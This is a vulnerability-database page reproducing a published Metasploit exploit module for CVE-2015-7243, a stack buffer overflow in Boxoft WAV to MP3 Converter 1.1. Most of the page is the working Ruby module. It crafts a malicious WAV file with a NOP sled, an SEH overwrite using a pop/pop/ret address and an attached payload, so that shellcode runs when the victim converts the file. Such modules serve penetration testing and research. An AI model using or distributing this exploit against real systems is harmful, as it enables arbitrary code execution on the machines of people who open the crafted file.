Lucene search
K

Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)

🗓️ 03 Jul 2018 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Boxoft WAV to MP3 Converter v1.1 Buffer Overflow, allows running shellcod

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Boxoft WAV To MP3 Converter 1.1 Buffer Overflow Exploit
3 Jul 201800:00
zdt
Circl
CVE-2015-7243
31 Aug 201500:00
circl
CNVD
Boxoft WAV to MP3 Converter Buffer Overflow Vulnerability
25 Sep 201500:00
cnvd
CVE
CVE-2015-7243
18 Sep 201516:00
cve
Cvelist
CVE-2015-7243
18 Sep 201516:00
cvelist
Metasploit
Boxoft WAV to MP3 Converter v1.1 Buffer Overflow
29 Jun 201820:17
metasploit
NVD
CVE-2015-7243
18 Sep 201516:59
nvd
Packet Storm
Boxoft Wav To MP3 Converter 1.0 Buffer Overflow
1 Jun 201600:00
packetstorm
Packet Storm
Boxoft WAV To MP3 Converter 1.1 Buffer Overflow
2 Jul 201800:00
packetstorm
Prion
Buffer overflow
18 Sep 201516:59
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
      'Description'    => %q{
       This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.
       By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the
       application, a buffer is overwritten, which allows for running shellcode.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Robbie Corley', # EDB POC
          'Shelby Pace'    # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2015-7243' ],
          [ 'EDB', '38035' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Boxoft WAV to MP3 Converter v1.1',
            {
              'Ret' => 0x0040144c # P/P/R from wavtomp3.exe (1.1.0.0)
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Aug 31 2015",
      'DefaultTarget'  => 0))

    register_options(
    [
      OptString.new('FILENAME', [true, 'The malicious file name', 'music.wav'])
    ])
  end

  def exploit
    file_payload = payload.encoded

    buf = make_fast_nops(4132)
    buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
    buf << [target.ret].pack("V*")  # seh
    buf << file_payload
    # Size isn't very sensitive
    buf << make_fast_nops(5860)

    file_create(buf)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jul 2018 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.73318
34